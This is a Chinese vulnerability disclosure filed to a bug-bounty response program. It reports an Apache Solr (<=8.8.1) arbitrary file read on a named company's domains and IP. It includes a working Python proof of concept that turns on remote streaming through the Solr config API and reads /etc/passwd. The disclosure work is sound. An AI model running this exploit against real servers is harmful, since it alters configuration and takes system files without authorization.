厂商名称：杭州思克达网络科技有限公司
所属SRC：互联网空间-亿万守护计划
漏洞标题：xxx网站存在敏感文件泄露
漏洞类别：web
漏洞类型: 事件型
利用通用漏洞：是
组件名称：Apache Solr <= 8.8.1任意文件读取漏洞
漏洞等级：高危
漏洞url：http://www.hvacren.cn:8983 http://hvacren.cn:8983 http://scoden.cn:8983 http://www.scoden.cn:8983
网站名称：杭州思克达网络科技有限公司
网站ip：47.111.253.154
所属地区：浙江省杭州市西湖区留下街道西溪路799号1幢907室
漏洞描述：Apache Solr存在任意文件读取,漏洞攻击者可以在未授权的情况下获取目标服务器敏感文件
公司业务：服务：网络信息技术、计算机软硬件、建筑技术、网络设备、通信技术、物联网技术、互联网技术的技术开发、技术服务、技术咨询、成果转让；批发、零售：计算机软硬件，电子产品（除专控）。（依法须经批准的项目，经相关部门批准后方可开展经营活动）
复现步骤：
# -*- coding: utf-8 -*-
import requests

host = "http://http://47.111.253.154:8983"
if host[-1] == '/':
    host = host[:-1]


def poc(host):
    url = host + '/solr/admin/cores?indexInfo=false&wt=json'
    core_data = requests.get(url, timeout=3).json()
    if core_data['status']:
        core = list(core_data['status'].keys())[0]
        jsonp_data = {"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": 'true'}}
        requests.post(url=host + "/solr/%s/config" % core, json=jsonp_data)

        result_data = requests.post(url=host + '/solr/%s/debug/dump?param=ContentStreams' % core,
                                    data={"stream.url": "file:///etc/passwd"}).json()
        if result_data['streams']:
            print(result_data['streams'][0]['stream'])
    else:
        exit("不存在此漏洞")


poc(host)
修复方案：由于官方拒绝修复该漏洞，因此请将Apache solr在内网中启动，若需要在公网中使用，需要限制访问ip 